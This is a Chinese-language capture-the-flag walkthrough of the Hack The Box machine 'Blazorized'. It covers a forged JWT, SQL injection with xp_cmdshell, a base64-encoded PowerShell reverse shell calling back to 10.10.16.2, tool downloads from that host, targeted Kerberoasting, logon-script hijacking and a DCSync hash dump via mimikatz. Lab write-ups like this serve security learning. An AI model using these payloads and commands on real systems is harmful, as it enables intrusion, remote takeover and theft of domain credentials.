HTB-H-Blazorized
HTB-Blazorized
提出疑问
- js抓取然后获得dll这边的手法我这残缺,我正常bp抓包的没有抓取到这个dll的调用
- jwt这个参数说是用Blazor Traffic Processor工具来分析这个raw,这个raw我翻遍了我的bp我也没有找到
正常步骤
显示爆破了一下子域名,出admin,然后↓这个出现api子域名的调用,写入hosts
广告
然后再点击一下check,浏览了一下发现有不错的广告资料,copy一份
Title: Active Directory
Below are links to projects and posts relating AD red-teaming:
https://github.com/Group3r/Group3r
https://github.com/Leo4j/Amnesiac
https://github.com/JPG0mez/ADCSync
https://github.com/Processus-Thief/HEKATOMB
https://github.com/Mazars-Tech/AD_Miner
https://github.com/AlmondOffSec/PassTheCert
https://github.com/synacktiv/ntdissector
https://github.com/Hackndo/pyGPOAbuse
https://exploit.ph/external-trusts-are-evil.html
https://github.com/SecuraBV/Timeroast
https://github.com/SadProcessor/CypherDog
https://mayfly277.github.io/
Title: Active Directory
Below are links to projects and posts relating AD blue-teaming:
https://github.com/lkarlslund/Adalanche
https://github.com/FalconForceTeam/FalconHound
https://github.com/csababarta/ntdsxtract
https://github.com/adrecon/ADRecon
Title: Uncategorized
The below research papers are uncategorized, and are to be investigated later:
https://thume.ca/2023/12/02/tracing-methods/
https://zakird.com/papers/tangled_web.pdf
https://jhalderm.com/pub/papers/censys-ccs15.pdf
https://jhalderm.com/pub/papers/zmap10gig-woot14.pdf
https://zakird.com/papers/lzr.pdf
https://zakird.com/papers/zlint.pdf
https://zakird.com/papers/zdns.pdf
继续
这边是看他文章说是api这便用的管理员的身份,jwt解一下可以看到管理员的邮箱
然而没有利用点
批量下载dll
1 | curl -s http://blazorized.htb/_framework/blazor.boot.json | jq | grep dll | cut -d ':' -f 1 | sed -e 's/\ //g' -e 's/"//g' | xargs -I % curl -s http://blazorized.htb/_framework/% -o ./DLLs/% |
伪造JWT
或者通过脚本
1 | import jwt |
虽然生成了,但在我这里没有生效
我直接在我的火狐浏览器的cookie那写不好使,不懂偶,然后我用下边的方法跑了一下就生效了👇
1 | let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzQ3OTI2ODcwfQ.WlUtJeMxxS6QGYaQjJ342qaYs7Jox8dAZRey83cPDUBPAk2nOPgEHpdPevk9Zqh4Gvhoe14NWySswpia9piiwA'; |
后台命令执行
1 | ' or 1=1; EXEC MASTER.sys.xp_cmdshell 'curl 10.10.16.2:444' -- - |
nc一下有回显
1 | ' or 1=1; EXEC MASTER.sys.xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'-- - |
获得shell->nu_1055
1 | powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/accesschk.exe' -OutFile 'C:\Temp\accesschk.exe'" |
SharpHound.exe -c all
然后传给Kali
1 | powershell |
横向移动1->rsa_4810
打WriteSPN
为了执行有针对性的 Kerberoasting,我将为 RSA_4810 账户分配一个 SPN。然后我可以作为该假冒服务请求票据,并获得一个使用 RSA_4810 密码加密的票据来破解。
1 | PS C:\Temp> . .\PowerView.ps1 |
横向移动2->ssa_6010
检查下一个用户
可以发现这个用户每分钟登陆一次
1 | 检查最近登陆时间 |
检查用户的登陆脚本
1 | Get-ADUser SSA_6010 -properties ScriptPath |
没有做设置,那就设一个
1 | Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'ddl' |
然后检查可写目录
https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
1 | upload /home/kali/ppyy/tool/powershell/accesschk.exe C:\Temp\ |
然后写码
1 | echo "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" | Out-File -FilePath ddl.bat -Encoding ASCII |
给成员属性赋值
就是指定脚本文件
1 | Get-ADUser SSA_6010 | Set-ADUser -ScriptPath 'A32FF3AEAA23\ddl.bat' |
之后监听等1分钟shell就来了
本地DCSync->administrator
有DCSync 权限,SSA_6010 可以导出域中的所有哈希值
把mimikatz传上去
1 | powershell -Command "Invoke-WebRequest -Uri 'http://10.10.16.2/mimikatz64.exe' -OutFile 'C:\Temp\mimikatz64.exe'" |
1 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force |